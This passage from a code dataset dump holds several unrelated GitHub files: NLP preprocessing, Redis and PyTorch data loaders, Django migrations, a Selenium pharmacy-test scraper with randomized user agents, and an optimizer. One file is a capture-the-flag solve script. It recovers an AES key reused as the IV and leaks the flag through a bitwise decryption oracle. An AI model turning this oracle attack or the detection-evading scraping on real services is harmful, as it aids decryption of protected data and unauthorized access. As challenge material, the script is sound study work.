parser.add_argument('--save-dir', type=str, required=True,\n help='set output directory. ex) output (not included slash \"/\")')\n args = parser.parse_args()\n\n inputs = file_to_list('input/raw')\n if args.token_type == 'phoneme':\n text_to_phoneme(text=inputs, save_dir=args.save_dir)\n elif args.token_type == 'morpheme':\n text_to_morpheme(text=inputs, save_dir=args.save_dir)\n elif args.token_type == 'word':\n text_to_word(text=inputs, save_dir=args.save_dir)\n\n\nmain()", "repo_name": "jx2lee/sentiment-analysis", "sub_path": "preprocess.py", "file_name": "preprocess.py", "file_ext": "py", "file_size_in_byte": 6356, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "utils.set_logger", "line_number": 12, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 14, "usage_type": "call"}, {"api_name": "hangul_utils.split_syllables", "line_number": 16, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.random.shuffle", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 39, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.random.shuffle", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 41, "usage_type": "attribute"}, {"api_name": "utils.folder_check", "line_number": 44, "usage_type": "call"}, {"api_name": "utils.folder_check", "line_number": 45, "usage_type": "call"}, {"api_name": "utils.save_npz", "line_number": 48, "usage_type": "call"}, {"api_name": "utils.save_npz", "line_number": 49, "usage_type": "call"}, {"api_name": "utils.save_pkl", "line_number": 50, "usage_type": "call"}, {"api_name": "utils.set_logger", "line_number": 56, "usage_type": "call"}, {"api_name": "konlpy.tag.Mecab", "line_number": 57, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 66, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 71, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 74, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 101, "usage_type": "attribute"}, {"api_name": "numpy.random.shuffle", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 102, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 103, "usage_type": "attribute"}, {"api_name": "numpy.random.shuffle", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 104, "usage_type": "attribute"}, {"api_name": "utils.folder_check", "line_number": 107, "usage_type": "call"}, {"api_name": "utils.folder_check", "line_number": 108, "usage_type": "call"}, {"api_name": "utils.save_npz", "line_number": 111, "usage_type": "call"}, {"api_name": "utils.save_npz", "line_number": 112, "usage_type": "call"}, {"api_name": "utils.save_pkl", "line_number": 113, "usage_type": "call"}, {"api_name": "utils.set_logger", "line_number": 119, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 128, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 133, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 136, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 162, "usage_type": "attribute"}, {"api_name": "numpy.random.shuffle", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 163, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 164, "usage_type": "attribute"}, {"api_name": "numpy.random.shuffle", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 165, "usage_type": "attribute"}, {"api_name": "utils.folder_check", "line_number": 168, "usage_type": "call"}, {"api_name": "utils.folder_check", "line_number": 169, "usage_type": "call"}, {"api_name": "utils.save_npz", "line_number": 172, "usage_type": "call"}, {"api_name": "utils.save_npz", "line_number": 173, "usage_type": "call"}, {"api_name": "utils.save_pkl", "line_number": 174, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 180, "usage_type": "call"}, {"api_name": "utils.file_to_list", "line_number": 187, "usage_type": "call"}]} +{"seq_id": "7251090211", "text": "import redis\nimport json\n\nr = redis.Redis(host='localhost', port=6378, db=0)\n\nwith open('artist.json', 'r') as fp:\n i = 1\n for line in fp:\n artist = json.loads(line)\n key = '%s-%d' % (artist['name'], artist['id'])\n r.hset(key, 'id', artist['id'])\n r.hset(key, 'name', artist['name'])\n r.hset(key, 'area', artist.get('area', ''))\n print('[%d] %s Inserted' % (i, artist['name']))\n i += 1\n", "repo_name": "aki202/nlp100", "sub_path": "chapter7/060.py", "file_name": "060.py", "file_ext": "py", "file_size_in_byte": 409, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "redis.Redis", "line_number": 4, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "36992257576", "text": "from torch.utils.data import TensorDataset, DataLoader\nimport torch\nimport numpy as np\nimport os\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nimport json\nfrom config.config import config\n\ndef standardize_data(data):\n return (data - data.mean(dim=0))/data.std(dim=0)\n\ndef mnist_torch_dataset(batch_size, full_dataset: bool, classes_subset=None):\n '''\n :param batch_size: \n :param full_dataset - if True, the dataloader will load the full dataset, batch_size ignored \n :return: \n '''\n \n default_path = config[\"default_data_path\"]\n train_dataset_path = os.path.join(default_path, 'mnist/pytorch/train_mnist.pth')\n test_dataset_path = os.path.join(default_path, 'mnist/pytorch/test_mnist.pth')\n\n train_data, train_labels = torch.load(train_dataset_path)\n test_data, test_labels = torch.load(test_dataset_path)\n train_data = train_data.div_(255.).reshape((train_data.shape[0],-1))\n test_data = test_data.div_(255.).reshape((test_data.shape[0],-1))\n if classes_subset is None:\n train_dataset = TensorDataset(train_data, train_labels)\n test_dataset = TensorDataset(test_data, test_labels)\n output_dim = 10\n else:\n tr_indices = np.isin(torch.argmax(train_labels,dim=1), classes_subset).nonzero()[0]\n tst_indices = np.isin(torch.argmax(test_labels,dim=1), classes_subset).nonzero()[0]\n train_dataset = TensorDataset(train_data[tr_indices,...], train_labels[tr_indices,:][:,classes_subset])\n test_dataset = TensorDataset(test_data[tst_indices,...], test_labels[tst_indices,:][:,classes_subset])\n output_dim = len(classes_subset)\n\n return train_dataset, test_dataset, 784, output_dim\n\ndef general_torch_dataset(dataset_name, standardise, standardise_labels=False, random_state=0):\n '''\n :param batch_size: \n :param full_dataset - if True, the dataloader will load the full dataset, batch_size ignored \n :return: \n '''\n \n default_path = config[\"default_data_path\"]\n \n datasets = os.listdir(default_path)\n if dataset_name not in datasets:\n print(\"Dataset is not available\")\n print(datasets)\n raise ValueError() \n \n path_to_dataset_dir = os.path.join(default_path, dataset_name, 'pytorch')\n # if len(os.listdir(path_to_dataset_dir)) == 2:\n # train_dataset_path = os.path.join(path_to_dataset_dir, 'train_%s.pth' %dataset_name)\n # test_dataset_path = os.path.join(path_to_dataset_dir, 'test_%s.pth' %dataset_name)\n\n # train_data, train_labels = torch.load(train_dataset_path)\n # test_data, test_labels = torch.load(test_dataset_path)\n \n # else:\n dataset_path = os.path.join(path_to_dataset_dir, '%s.pth' %dataset_name)\n data, labels = torch.load(dataset_path)\n if standardise:\n data = standardize_data(data)\n \n if standardise_labels:\n scaler = StandardScaler()\n if train_labels.ndim == 1:\n train_labels = train_labels.reshape(-1,1)\n test_labels = test_labels.reshape(-1,1)\n \n train_labels = torch.Tensor(scaler.fit_transform(train_labels))\n test_labels = torch.Tensor(scaler.transform(test_labels))\n \n train_data, test_data, train_labels, test_labels = train_test_split(data,labels, test_size=0.2, random_state=random_state)\n \n train_dataset = TensorDataset(train_data, train_labels)\n test_dataset = TensorDataset(test_data, test_labels)\n\n if (len(train_data.shape) != 2) or (len(train_labels.shape) != 2):\n raise ValueError('This loader is not suitable from this dataset') \n input_dim = train_data.shape[1]\n output_dim = train_labels.shape[1]\n return train_dataset, test_dataset, input_dim, output_dim\n\n\ndef linearly_separable_data(n_train_points, n_test_points, onehot=False):\n x_train = np.random.rand(n_train_points, 2) - 0.5\n x_test = np.random.rand(n_test_points, 2) - 0.5\n y_train = np.apply_along_axis(lambda x: int(x[0] < x[1]), axis=1, arr=x_train)\n y_test = np.apply_along_axis(lambda x: int(x[0] < x[1]), axis=1, arr=x_test)\n\n if onehot:\n y_train = np.eye(2)[y_train]\n y_test = np.eye(2)[y_test]\n\n train_dataset = TensorDataset(torch.Tensor(x_train), torch.Tensor(y_train))\n test_dataset = TensorDataset(torch.Tensor(x_test), torch.Tensor(y_test))\n \n train_dataloader = DataLoader(train_dataset,\n batch_size=n_train_points,\n shuffle=True,\n num_workers=0,\n pin_memory=False)\n \n test_dataloader = DataLoader(test_dataset,\n batch_size=n_train_points,\n shuffle=True,\n num_workers=0,\n pin_memory=False)\n\n \n return train_dataloader, test_dataloader\n \ndef synthetic_regression_problem(train_len, noise_level=0.1):\n '''\n Implements Doppler function from \n\n Wasserman, Larry. All of nonparametric statistics. Springer Science & Business Media, 2006.\n Eq. (5.64)\n '''\n x = np.linspace(0,1,1000)\n func = lambda x: np.sqrt(x*(1-x)) * np.sin(2.1*np.pi/(x+0.05))\n train_idx = sorted(np.random.choice(range(len(x)), train_len, replace=False))\n x_train = x[train_idx]\n y_train =(func(x_train) + np.random.randn(len(x_train))*noise_level)\n return x_train.reshape(-1,1), y_train, func", "repo_name": "bkozyrskiy/Local_GP", "sub_path": "datasets.py", "file_name": "datasets.py", "file_ext": "py", "file_size_in_byte": 5509, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "config.config.config", "line_number": 20, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.isin", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.isin", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 36, "usage_type": "call"}, {"api_name": "config.config.config", "line_number": 48, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 66, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 77, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 92, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 93, "usage_type": "attribute"}, {"api_name": "numpy.apply_along_axis", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.apply_along_axis", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 99, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 127, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 128, "usage_type": "attribute"}, {"api_name": "numpy.random.randn", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 130, "usage_type": "attribute"}]} +{"seq_id": "25013606746", "text": "import os\nimport re\n\nfrom setuptools import setup # type: ignore\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\n\ndef version():\n version_pattern = r\"__version__\\W*=\\W*\\\"([^\\\"]+)\\\"\"\n src = os.path.join(os.path.dirname(__file__), 'aiohec/__init__.py')\n with open(src, 'r') as f:\n (v,) = re.findall(version_pattern, f.read())\n return v\n\n\nsetup(\n name='aiohec',\n version=version(),\n author='Marcus LaFerrera',\n author_email='mlaferrera@splunk.com',\n description='An async Splunk module for Getting Data In (GDI)',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n license='Apache License 2.0',\n url='https://github.com/splunk/aiohec',\n include_package_data=True,\n packages=['aiohec'],\n install_requires=open('requirements.txt').read().split(),\n keywords='splunk',\n python_requires='>=3.7',\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Information Technology',\n 'Intended Audience :: Developers',\n 'Intended Audience :: System Administrators',\n 'Topic :: Utilities',\n 'License :: OSI Approved :: Apache Software License',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: 3.9',\n ],\n)\n", "repo_name": "splunk/aiohec", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1366, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 12, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 14, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "23934074903", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('core', '0005_auto_20150525_0009'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='prueba',\n name='testAuth',\n field=models.ForeignKey(verbose_name=b'Realizada por', to=settings.AUTH_USER_MODEL),\n ),\n migrations.AlterField(\n model_name='prueba',\n name='testId',\n field=models.IntegerField(verbose_name=b'Id prueba'),\n ),\n ]\n", "repo_name": "OviLuis/CasosDePrueba", "sub_path": "core/migrations/0006_auto_20150525_0209.py", "file_name": "0006_auto_20150525_0209.py", "file_ext": "py", "file_size_in_byte": 648, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 8, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 15, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 15, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 18, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "5698895646", "text": "# Baekjoon Online Judge - 14267번. 회사 문화 1\n\nfrom collections import deque\n\n\nN, M = map(int, input().split())\nboss = [0] + list(map(int, input().split())) # 1번이 사장(직원 N명의 직속 상사 번호)\n\nW = [0] * (N + 1) # 칭찬 수치\n\nfor _ in range(M):\n i, w = map(int, input().split())\n W[i] += w\n\njuniors = [[] for _ in range(N + 1)] # 각 직원의 부하직원들 리스트\nfor i in range(2, N + 1):\n juniors[boss[i]].append(i)\n\nq = deque([1]) # 1번부터 출발\nwhile q:\n senior = q.popleft()\n for junior in juniors[senior]:\n # 현재 상사의 칭찬 값을 부하직원에게 더해준다.\n W[junior] += W[senior]\n q.append(junior)\nprint(*W[1:])\n", "repo_name": "wnstj-yang/Algorithm", "sub_path": "BOJ/BOJ_14267.py", "file_name": "BOJ_14267.py", "file_ext": "py", "file_size_in_byte": 709, "program_lang": "python", "lang": "ko", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.deque", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "19535247028", "text": "#!/usr/bin/env python3\nfrom pwn import *\nfrom Crypto.Cipher import AES\n\ndef pad(msg, length=16):\n n = (-len(msg)) % length\n return msg + bytes([0]*n)\n\ndef sendmsg(msg):\n r.sendlineafter(b\"ata to be decrypted:\\n\", msg.hex().encode())\n r.readuntil(b\"Your decrypted data is \")\n ct = bytes.fromhex(r.readline()[:-1].decode())\n r.readuntil(b\"Your data is \")\n score = float(r.readuntil(b\"%\")[:-1])\n r.readline()\n return ct, score/100.0*len(ct)*8.0\n\ndef decrypt(msg, key):\n return AES.new(key, AES.MODE_CBC, iv=key).decrypt(msg)\n\ndef encrypt(msg, key):\n return AES.new(key, AES.MODE_CBC, iv=key).encrypt(msg)\n\ndef score_me(flag, byte):\n ct = pad(flag + bytes([byte]))\n _, score1 = sendmsg(ct)\n _, score2 = sendmsg(ct + zero_ct)\n return score2 - score1\n\nr = remote(\"127.0.0.1\", 50000)\n#r = process(\"./local-service.py\", stderr=2)\n\n# Get the iv / key\nct = b\"A\"*32\npt, _ = sendmsg(ct)\nkey = xor(ct[:16], pt[16:], pt[:16])\nassert decrypt(ct, key) == pt\n\nzero_ct = AES.new(key, AES.MODE_ECB).encrypt(b\"\\x00\"*16)\nassert AES.new(key, AES.MODE_ECB).decrypt(zero_ct) == b\"\\x00\"*16\n\n# Random assertion\npt, score = sendmsg(zero_ct*2)\nassert pt[:16] == key and pt[16:] == zero_ct\n\nflag = b\"\"\nwhile True:\n byte = 0\n for i in range(8):\n s1 = score_me(flag, byte | (1 << i))\n s2 = score_me(flag, byte)\n if s1 > s2:\n byte |= (1 << i)\n print(\"i:\", i, s1, s2, int(s1 > s2), flag + bytes([byte]))\n flag += bytes([byte])\n try:\n print(flag.decode())\n except:\n print(flag)\nprint(flag.decode())\n\nr.interactive()\n", "repo_name": "Kodsport/sakerhetssm-2023-solutions", "sub_path": "kval/crypto/CyBerCrime/solve-mkg/solve.py", "file_name": "solve.py", "file_ext": "py", "file_size_in_byte": 1595, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "Crypto.Cipher.AES.new", "line_number": 19, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 19, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.MODE_CBC", "line_number": 19, "usage_type": "attribute"}, {"api_name": "Crypto.Cipher.AES.new", "line_number": 22, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 22, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.MODE_CBC", "line_number": 22, "usage_type": "attribute"}, {"api_name": "Crypto.Cipher.AES.new", "line_number": 39, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 39, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.MODE_ECB", "line_number": 39, "usage_type": "attribute"}, {"api_name": "Crypto.Cipher.AES.new", "line_number": 40, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 40, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.MODE_ECB", "line_number": 40, "usage_type": "attribute"}]} +{"seq_id": "6473594125", "text": "from django.urls import path\nfrom django.conf.urls import url\nfrom .api import JogadorView, JogadorRegistrationView, RankingView, JogadorUpdateView, OneUserView\n\nurlpatterns = [\n path('registration/', JogadorRegistrationView.as_view(), name=\"jogador-create\"),\n path('update/', JogadorUpdateView.as_view(), name=\"jogador-update\"),\n path('ranking/', RankingView.as_view(), name=\"ranking\"),\n path('', JogadorView.as_view(), name=\"jogadores\"),\n url(r'^(?P\\d+)/$', OneUserView.as_view(), name='jogador'),\n]", "repo_name": "TCC-CIMATEC/TCC-BACK", "sub_path": "jogador/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 520, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "api.JogadorRegistrationView.as_view", "line_number": 6, "usage_type": "call"}, {"api_name": "api.JogadorRegistrationView", "line_number": 6, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "api.JogadorUpdateView.as_view", "line_number": 7, "usage_type": "call"}, {"api_name": "api.JogadorUpdateView", "line_number": 7, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "api.RankingView.as_view", "line_number": 8, "usage_type": "call"}, {"api_name": "api.RankingView", "line_number": 8, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "api.JogadorView.as_view", "line_number": 9, "usage_type": "call"}, {"api_name": "api.JogadorView", "line_number": 9, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "api.OneUserView.as_view", "line_number": 10, "usage_type": "call"}, {"api_name": "api.OneUserView", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "9380271068", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.edge.options import Options as EdgeOptions\nfrom datetime import datetime, timedelta\nfrom webdriver_manager.microsoft import EdgeChromiumDriverManager\nfrom selenium.webdriver.edge.service import Service as EdgeService\nfrom selenium.webdriver.common.by import By\nfrom fake_useragent import UserAgent\nfrom pprint import pprint\nimport selenium.common.exceptions\nimport time\nimport json\nimport logging\nfrom datetime import datetime, timezone\n\nfrom bs4 import BeautifulSoup\n\n\nlogging.basicConfig(filename=\"errorlogs.log\", level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\ndef User():\n\n ua = UserAgent()\n return ua.random\n\n\ndef makeTest(name: str, price: float, description: str):\n return {\n \"name\": str(name),\n \"price\": price,\n \"description\": str(description),\n }\n\n\nedge_options = EdgeOptions()\noptions = [\n \"--headless\",\n \"--disable-gpu\",\n \"--window-size=1920,1200\",\n \"--ignore-certificate-errors\",\n \"--disable-extensions\",\n \"--no-sandbox\",\n \"--disable-dev-shm-usage\"\n]\n\nfor option in options:\n edge_options.add_argument(option)\nedge_options.add_argument(f'user-agent={User()}')\nedge_options.add_experimental_option('excludeSwitches', ['enable-logging'])\n\nbrowser = webdriver.Edge(service=EdgeService(\n EdgeChromiumDriverManager().install()), options=edge_options)\n\nurl = \"https://pharmeasy.in/diagnostics/all-tests\"\nbrowser.get(url)\n\n# creating array\ndata = []\n\ntry:\n # waiting and scrolling in page\n current_scroll_position, new_height= 0, 1\n speed = 20\n while current_scroll_position <= new_height:\n current_scroll_position += speed\n browser.execute_script(\"window.scrollTo(0, {});\".format(current_scroll_position))\n new_height = browser.execute_script(\"return document.body.scrollHeight\")\n\n # getting all the tests\n tests = browser.find_element(\"xpath\", r'//*[@id=\"content-container\"]/div[1]/div')\n all_tests = tests.find_elements(By.TAG_NAME, \"a\")\n print(len(all_tests))\n\n for test in all_tests:\n # open link in new tab\n url = test.get_attribute(\"href\")\n\n browser.execute_script(\"window.open('');\")\n browser.switch_to.window(browser.window_handles[1])\n browser.get(url)\n \n test_info = browser.find_element(\"xpath\", r'//*[@id=\"content-container\"]/div[1]')\n number_of_elements = len(test_info.find_elements(By.TAG_NAME, \"div\"))\n\n # getting name and price\n name = browser.find_element(\"xpath\", r'//*[@id=\"content-container\"]/div[1]/div[2]/div[1]/div/div[1]/h1').text\n try:\n price = browser.find_element(\"xpath\", r'//*[@id=\"content-container\"]/div[1]/div[2]/div[1]/div/div[3]').text\n except:\n price = browser.find_element(\"xpath\", r'//*[@id=\"content-container\"]/div[1]/div[2]/div[1]/div/div[2]').text\n\n price = price.replace(\"₹\", \"\")\n price = price.replace(\",\", \"\")\n price = int(price.split()[0])\n\n description = browser.find_element(By.CLASS_NAME, '_32yDO').text\n \n\n browser.close()\n\n # creating test object\n test = makeTest(name, price, description)\n data.append(test)\n json.dump(data, open(\"json/tests.json\", \"w\"), indent=2)\n browser.switch_to.window(browser.window_handles[0])\n\n\n\n\nexcept Exception as e:\n print(\"UNEXPECTED ERROR OCCURED\")\n logger.info(\"Something terrible happened\")\n logger.exception(e)\n logger.info(\"\\n\")\nfinally:\n browser.quit()\n logger.info(\"End time : \" + str(datetime.now()))\n", "repo_name": "Caffeinated-Typists/DrugVeda", "sub_path": "data/test_scraper.py", "file_name": "test_scraper.py", "file_ext": "py", "file_size_in_byte": 3682, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.basicConfig", "line_number": 20, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 20, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 21, "usage_type": "call"}, {"api_name": "fake_useragent.UserAgent", "line_number": 26, "usage_type": "call"}, {"api_name": "selenium.webdriver.edge.options.Options", "line_number": 38, "usage_type": "call"}, {"api_name": "selenium.webdriver.Edge", "line_number": 54, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 54, "usage_type": "name"}, {"api_name": "selenium.webdriver.edge.service.Service", "line_number": 54, "usage_type": "call"}, {"api_name": "webdriver_manager.microsoft.EdgeChromiumDriverManager", "line_number": 55, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.TAG_NAME", "line_number": 74, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 74, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.TAG_NAME", "line_number": 86, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 86, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 99, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 99, "usage_type": "name"}, {"api_name": "json.dump", "line_number": 107, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 120, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 120, "usage_type": "name"}]} +{"seq_id": "7357358654", "text": "from collections import OrderedDict\nimport numpy as np\nimport os\nimport shutil\nimport time\nimport multiprocessing as mp\n\ndef grad(f,x,dx,central,pool):\n n = len(x)\n\n if central:\n argslist = []\n for i in range(n):\n dx_v = np.zeros((n,1))\n dx_v[i] = dx\n argslist.append(x-dx_v)\n argslist.append(x+dx_v)\n else:\n argslist = []\n for i in range(n):\n dx_v = np.zeros((n,1))\n dx_v[i] = dx\n argslist.append(x+dx_v)\n argslist.append(x)\n\n results = pool.map(f,argslist)\n\n gradient = np.zeros((n,1))\n if central:\n for i in range(n):\n gradient[i] = (results[2*i+1]-results[2*i])/(2*dx)\n else:\n for i in range(n):\n gradient[i] = (results[i]-results[-1])/dx\n return gradient\n\nclass Settings:\n \"\"\"Contains settings used by optimizer\"\"\"\n\n def __init__(self,**kwargs):\n\n # Objective function args\n self.args = kwargs.get(\"args\",())\n\n # General args\n self.method = kwargs.get(\"method\")\n self.termination_tol = kwargs.get(\"termination_tol\",1e-9)\n self.grad_tol = kwargs.get(\"grad_tol\",1e-9)\n self.verbose = kwargs.get(\"verbose\",False)\n 